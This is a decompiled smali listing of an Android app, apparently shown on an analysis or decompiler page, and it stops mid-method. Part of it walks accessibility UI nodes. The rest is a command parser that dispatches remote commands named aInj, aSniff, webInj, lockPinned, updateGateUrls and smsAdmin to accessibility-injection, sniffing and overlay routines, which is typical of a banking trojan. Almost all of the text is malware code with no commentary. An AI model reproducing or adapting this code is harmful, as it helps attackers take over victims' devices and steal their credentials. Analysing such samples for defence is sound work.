                        249invoke-virtual {p1, v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        250move-result-object v1
                        251goto/16 :goto_123
                        252pswitch_14a:
                        253const-string v1, "position"
                        255invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        256move-result v1
                        258invoke-virtual {p1, v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        259move-result-object v1
                        261const-string v2, "2position"
                        263invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        264move-result v2
                        266invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        267move-result-object v1
                        268goto/16 :goto_123
                        269pswitch_15f:
                        270const-string v1, "position"
                        272invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        273move-result v1
                        275invoke-virtual {p1, v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        276move-result-object v1
                        278const-string v2, "2position"
                        280invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        281move-result v2
                        283invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        284move-result-object v1
                        286const-string v2, "3position"
                        288invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        289move-result v2
                        291invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        292move-result-object v1
                        293goto/16 :goto_123
                        294pswitch_17e:
                        295invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        296move-result-object v1
                        297goto/16 :goto_123
                        298pswitch_183:
                        299const-string v2, "cid"
                        301invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        302move-result v2
                        303if-nez v2, :cond_1c1
                        304new-instance v1, Ljava/lang/StringBuilder;
                        306invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        308const-string v2, "getElement[cid]: "
                        310invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        311move-result-object v1
                        313const-string v2, "cid"
                        315invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        316move-result-object v2
                        318invoke-virtual {p0, v5, v2}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        319move-result-object v2
                        321invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        322move-result-object v1
                        324invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        325move-result-object v1
                        327invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        329const-string v1, "cid"
                        331invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        332move-result-object v1
                        334invoke-virtual {p0, v5, v1}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        335move-result-object v1
                        337const-string v2, "position"
                        339invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        340move-result v2
                        342invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        343move-result-object v1
                        344goto/16 :goto_123
                        345cond_1c1:
                        346const-string v2, "pid"
                        348invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        349move-result v2
                        350if-nez v2, :cond_123
                        351new-instance v1, Ljava/lang/StringBuilder;
                        353invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        355const-string v2, "getElement[pid]: "
                        357invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        358move-result-object v1
                        360const-string v2, "pid"
                        362invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        363move-result-object v2
                        365invoke-virtual {p0, v5, v2}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        366move-result-object v2
                        368invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        369move-result-object v1
                        371invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        372move-result-object v1
                        374invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        376const-string v1, "pid"
                        378invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        379move-result-object v1
                        381invoke-virtual {p0, v5, v1}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        382move-result-object v1
                        384const-string v2, "check"
                        386invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        387move-result v2
                        388if-nez v2, :cond_20a
                        390const-string v2, "check"
                        392invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        393move-result-object v2
                        395invoke-direct {p0, v5, v2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        396move-result-object v2
                        397if-nez v2, :cond_20a
                        398move-object p1, v0
                        399goto/16 :goto_c5
                        400cond_20a: const/4 v2, 0x1
                        402invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        404const-string v2, "level"
                        406invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        407move-result v2
                        408if-nez v2, :cond_21f
                        410const-string v2, "level"
                        412invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        413move-result v2
                        415invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        416cond_21f: const/4 v2, 0x0
                        418invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        419move-result-object v2
                        420goto_224:
                        421invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        422move-result v3
                        424const-string v4, "level"
                        426invoke-virtual {p2, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        427move-result v4
                        428if-ge v3, v4, :cond_123
                        430invoke-virtual {v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        431move-result-object v1
                        433invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        434move-result v2
                        435add-int/lit8 v2, v2, 0x1
                        437invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        438move-result-object v2
                        439goto/16 :goto_224
                        440pswitch_23f:
                        441const-string v2, "ctext"
                        443invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        444move-result v2
                        445if-nez v2, :cond_27d
                        446new-instance v1, Ljava/lang/StringBuilder;
                        448invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        450const-string v2, "[text] getElement[cid]: "
                        452invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        453move-result-object v1
                        455const-string v2, "ctext"
                        457invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        458move-result-object v2
                        460invoke-direct {p0, v5, v2}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        461move-result-object v2
                        463invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        464move-result-object v1
                        466invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        467move-result-object v1
                        469invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        471const-string v1, "ctext"
                        473invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        474move-result-object v1
                        476invoke-direct {p0, v5, v1}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        477move-result-object v1
                        479const-string v2, "position"
                        481invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        482move-result v2
                        484invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        485move-result-object v1
                        486goto/16 :goto_123
                        487cond_27d:
                        488const-string v2, "ptext"
                        490invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        491move-result v2
                        492if-nez v2, :cond_123
                        493new-instance v1, Ljava/lang/StringBuilder;
                        495invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        497const-string v2, "[text] getElement[pid]: "
                        499invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        500move-result-object v1
                        502const-string v2, "ptext"
                        504invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        505move-result-object v2
                        507invoke-direct {p0, v5, v2}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        508move-result-object v2
                        510invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        511move-result-object v1
                        513invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        514move-result-object v1
                        516invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        518const-string v1, "ptext"
                        520invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        521move-result-object v1
                        523invoke-direct {p0, v5, v1}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        524move-result-object v1
                        525const/4 v2, 0x1
                        527invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        529const-string v2, "level"
                        531invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        532move-result v2
                        533if-nez v2, :cond_2c4
                        535const-string v2, "level"
                        537invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        538move-result v2
                        540invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        541cond_2c4: const/4 v2, 0x0
                        543invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        544move-result-object v2
                        545goto_2c9:
                        546invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        547move-result v3
                        549const-string v4, "level"
                        551invoke-virtual {p2, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        552move-result v4
                        553if-ge v3, v4, :cond_123
                        555invoke-virtual {v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        556move-result-object v1
                        558invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        559move-result v2
                        560add-int/lit8 v2, v2, 0x1
                        562invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        563move-result-object v2
                        564goto/16 :goto_2c9
                        565pswitch_2e4:
                        566const-string v1, "pText"
                        568invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        569move-result-object v1
                        571invoke-direct {p0, v5, v1}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        572move-result-object v1
                        574invoke-virtual {v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getParent()Landroid/view/accessibility/AccessibilityNodeInfo;
                        575move-result-object v1
                        577const-string v2, "position"
                        579invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        580move-result v2
                        582invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getChild(I)Landroid/view/accessibility/AccessibilityNodeInfo;
                        583try_end_2fb: move-result-object v1
                        584goto/16 :goto_123
                        585catch_2fe: move-exception v1
                        586new-instance v2, Ljava/lang/StringBuilder;
                        588invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        590const-string v3, "getElement[T]: "
                        592invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        593move-result-object v2
                        595invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        596move-result-object v1
                        598invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        599move-result-object v1
                        601invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        602move-object p1, v0
                        603goto/16 :goto_c5
                        604cond_318: move-object p1, v0
                        605goto/16 :goto_c5
                        606cond_31b: move-object v1, v0
                        607goto/16 :goto_54
                        608cond_31e: move-object v5, v1
                        609goto/16 :goto_1c
                        610cond_321: move-object v1, p1
                        611goto/16 :goto_d
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • org.json.JSONArray.length
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.intValue
                        • org.json.JSONArray.getJSONObject
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • org.json.JSONArray.getJSONObject
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.getString
                        • java.lang.String.hashCode
                        • org.json.JSONObject.put
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • org.json.JSONObject.getInt
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Thread.sleep
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getString
                        • java.lang.String.split
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getString
                        • java.lang.String.split
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getBoolean
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getString
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getJSONArray
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.String.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.toString
                        Strings
                        • [func] [parseCommand] command:
                        • aInj
                        • aSniff
                        • webInj
                        • lockPinned
                        • updateGateUrls
                        • smsAdmin
                        • webInjPrefs
                        • pinnedPrefs
                        • gateUrlsPrefs
                        • [func] [parseCommand] Exception! [loadUrls] urlsFallback:
                        • [func] [parseCommand] command
                        • T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x1
                        2new-instance v5, Lorg/json/JSONObject;
                        4invoke-direct {v5}, Lorg/json/JSONObject;-><init>()V
                        5new-instance v0, Lorg/json/JSONObject;
                        7invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        9const-string v1, ""
                        10const/4 v0, 0x0
                        11try_start_e:
                        12invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        13move-result-object v0
                        14goto_12:
                        15invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        16move-result v3
                        18invoke-virtual {p2}, Lorg/json/JSONArray;->length()I
                        19move-result v4
                        20if-ge v3, v4, :cond_2fd
                        21new-instance v3, Ljava/lang/StringBuilder;
                        23invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        25const-string v4, "[func] [parseCommand] command: "
                        27invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28move-result-object v3
                        30invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        31move-result v4
                        33invoke-virtual {p2, v4}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        34move-result-object v4
                        36invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        37move-result-object v3
                        39invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        40move-result-object v3
                        42invoke-virtual {p0, v3}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        44invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        45move-result v3
                        47invoke-virtual {p2, v3}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        48move-result-object v6
                        49const/4 v3, 0x2
                        51invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        52move-result-object v3
                        54sget-object v4, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        56sget-object v7, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        58invoke-virtual {v6, v7}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        59move-result v7
                        61invoke-virtual {v5, v4, v7}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
                        63sget-object v4, Lcom/lib;->STRINGS_STATUS:Ljava/lang/String;
                        64const/4 v7, 0x2
                        66invoke-virtual {v5, v4, v7}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
                        68sget-object v4, Lcom/lib;->STRINGS_COMMAND:Ljava/lang/String;
                        70invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        71move-result-object v1
                        72const/4 v4, -0x1
                        74invoke-virtual {v1}, Ljava/lang/String;->hashCode()I
                        75move-result v7
                        76sparse-switch v7, :sswitch_data_308
                        77cond_66: packed-switch v4, :pswitch_data_322
                        78const/4 v2, 0x0
                        79goto_6a:
                        80sget-object v4, Lcom/lib;->STRINGS_STATUS:Ljava/lang/String;
                        82invoke-virtual {v5, v4, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        84invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        85move-result v0
                        86add-int/lit8 v0, v0, 0x1
                        88invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        89move-result-object v0
                        90goto/16 :goto_12
                        91sswitch_7a:
                        92const-string v7, "aInj"
                        94invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        95move-result v7
                        96if-eqz v7, :cond_66
                        97const/4 v4, 0x0
                        98goto/16 :goto_66
                        99sswitch_84:
                        100const-string v7, "aSniff"
                        102invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        103move-result v7
                        104if-eqz v7, :cond_66
                        105const/4 v4, 0x1
                        106goto/16 :goto_66
                        107sswitch_8e:
                        108const-string v7, "webInj"
                        110invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        111move-result v7
                        112if-eqz v7, :cond_66
                        113const/4 v4, 0x2
                        114goto/16 :goto_66
                        115sswitch_98:
                        116const-string v7, "lockPinned"
                        118invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        119move-result v7
                        120if-eqz v7, :cond_66
                        121const/4 v4, 0x3
                        122goto/16 :goto_66
                        123sswitch_a2:
                        124const-string v7, "updateGateUrls"
                        126invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        127move-result v7
                        128if-eqz v7, :cond_66
                        129const/4 v4, 0x4
                        130goto/16 :goto_66
                        131sswitch_ac:
                        132const-string v7, "smsAdmin"
                        134invoke-virtual {v1, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        135move-result v7
                        136if-eqz v7, :cond_66
                        137const/4 v4, 0x5
                        138goto/16 :goto_66
                        139pswitch_b6: sget-boolean v4, Lcom/lib;->isA11yInjected:Z
                        140if-eqz v4, :cond_c3
                        142sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        144invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        145move-result v4
                        146const/4 v7, 0x1
                        147if-eq v4, v7, :cond_122
                        148cond_c3:
                        149iget-object v4, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        151invoke-virtual {p0, p1, v4}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        152move-result v4
                        153if-eqz v4, :cond_11b
                        155invoke-virtual {p0, p1}, Lcom/lib;->isScreenLocked(Landroid/content/Context;)Z
                        156move-result v4
                        157if-nez v4, :cond_114
                        159sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        161invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        162move-result v4
                        163packed-switch v4, :pswitch_data_332
                        164goto/16 :goto_6a
                        165pswitch_db:
                        166invoke-virtual {p0, p1}, Lcom/lib;->stopA11yInject(Landroid/content/Context;)V
                        167const/4 v3, 0x3
                        169invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        170move-result-object v3
                        171goto/16 :goto_6a
                        172pswitch_e4:
                        173invoke-virtual {p0, p1}, Lcom/lib;->lockOverlay(Landroid/content/Context;)V
                        175sget-object v3, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        177invoke-virtual {v6, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        178move-result-object v3
                        180sget-object v4, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        182invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        183move-result v4
                        185invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        186move-result-object v4
                        188invoke-virtual {p0, p1, v3, v4}, Lcom/lib;->startA11yInject(Landroid/content/Context;Ljava/lang/String;Ljava/lang/Integer;)Z
                        189move-result v3
                        190if-eqz v3, :cond_105
                        191const/16 v3, 0x9
                        193invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        194move-result-object v3
                        195goto/16 :goto_6a
                        196cond_105: const-wide/16 v6, 0x2bc
                        198invoke-static {v6, v7}, Ljava/lang/Thread;->sleep(J)V
                        200invoke-virtual {p0, p1}, Lcom/lib;->stopA11yInject(Landroid/content/Context;)V
                        201const/4 v3, 0x2
                        203invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        204move-result-object v3
                        205goto/16 :goto_6a
                        206cond_114: const/4 v3, 0x5
                        208invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        209move-result-object v3
                        210goto/16 :goto_6a
                        211cond_11b: const/4 v3, 0x4
                        213invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        214move-result-object v3
                        215goto/16 :goto_6a
                        216cond_122: const/4 v3, 0x6
                        218invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        219move-result-object v3
                        220goto/16 :goto_6a
                        221pswitch_129:
                        222iget-object v4, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        224invoke-virtual {p0, p1, v4}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        225move-result v4
                        226if-eqz v4, :cond_16a
                        228sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        230invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        231move-result v4
                        232packed-switch v4, :pswitch_data_33a
                        233goto/16 :goto_6a
                        234pswitch_13c:
                        235invoke-virtual {p0}, Lcom/lib;->stopA11ySniffer()V
                        236const/4 v3, 0x3
                        238invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        239move-result-object v3
                        240goto/16 :goto_6a
                        241pswitch_146:
                        242invoke-virtual {p0}, Lcom/lib;->stopA11ySniffer()V
                        244sget-object v3, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        246invoke-virtual {v6, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        247move-result-object v3
                        249sget-object v4, Lcom/lib;->STRINGS_DELIMETR_ZPT:Ljava/lang/String;
                        251invoke-virtual {v3, v4}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
                        252move-result-object v3
                        253const/4 v4, 0x1
                        255invoke-virtual {p0, p1, v3, v4}, Lcom/lib;->startA11ySniffer(Landroid/content/Context;[Ljava/lang/String;Z)Z
                        256move-result v3
                        257if-eqz v3, :cond_163
                        258const/4 v3, 0x3
                        260invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        261move-result-object v3
                        262goto/16 :goto_6a
                        263cond_163: const/4 v3, 0x2
                        265invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        266move-result-object v3
                        267goto/16 :goto_6a
                        268cond_16a: const/4 v3, 0x4
                        270invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        271move-result-object v3
                        272goto/16 :goto_6a
                        273pswitch_171:
                        274sget-object v4, Lcom/lib;->STRINGS_ACTION:Ljava/lang/String;
                        276invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        277move-result v4
                        278packed-switch v4, :pswitch_data_342
                        279goto/16 :goto_6a
                        280pswitch_17c:
                        281const-string v3, "webInjPrefs"
                        283invoke-virtual {p0, p1, v3}, Lcom/lib;->cleanWebInjConfig(Landroid/content/Context;Ljava/lang/String;)Z
                        284move-result v3
                        285if-eqz v3, :cond_1ae
                        286const/4 v3, 0x3
                        288invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        289move-result-object v3
                        290goto/16 :goto_6a
                        291pswitch_18b:
                        292const-string v3, "webInjPrefs"
                        294sget-object v4, Lcom/lib;->STRINGS_DATA:Ljava/lang/String;
                        296invoke-virtual {v6, v4}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        297move-result-object v4
                        299sget-object v6, Lcom/lib;->STRINGS_DELIMETR_ZPT:Ljava/lang/String;
